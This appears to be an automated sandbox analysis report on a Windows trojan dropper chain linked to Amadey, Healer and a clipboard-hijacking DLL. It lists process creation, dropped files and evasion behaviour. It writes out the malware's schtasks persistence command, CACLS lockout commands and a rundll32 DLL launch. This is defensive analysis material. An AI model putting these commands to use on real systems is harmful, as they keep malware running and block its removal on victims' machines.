                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@38/14@0/1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 6_2_00007FFC9D7D1A1D ControlService,ChangeServiceConfigA,
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: file.exeVirustotal: Detection: 48%
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_01
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCommand line argument: Kernel32.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCommand line argument: 08A
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
                          Source: Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
                          Source: Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB724D push ecx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_0094724D push ecx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C40C push cs; iretd
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00423149 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C50E push cs; iretd
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004231C8 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040E21D push ecx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C6BE push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067C125 push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066E484 push ecx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067BE73 push cs; iretd
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067BF75 push cs; iretd
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0085C693 push edi; retf
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00859748 push FFFFFFE1h; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377D26 push ecx; ret
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0136F748 push E8FFFFFBh; iretd
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
                          Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

                          Persistence and Installation Behavior

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe TID: 3804Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 3868Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep count: 64 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep time: -1920000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6028Thread sleep time: -50000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044Thread sleep count: 52 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044Thread sleep time: -9360000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5992Thread sleep count: 47 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840Thread sleep count: 189 > 30
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840Thread sleep time: -189000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477
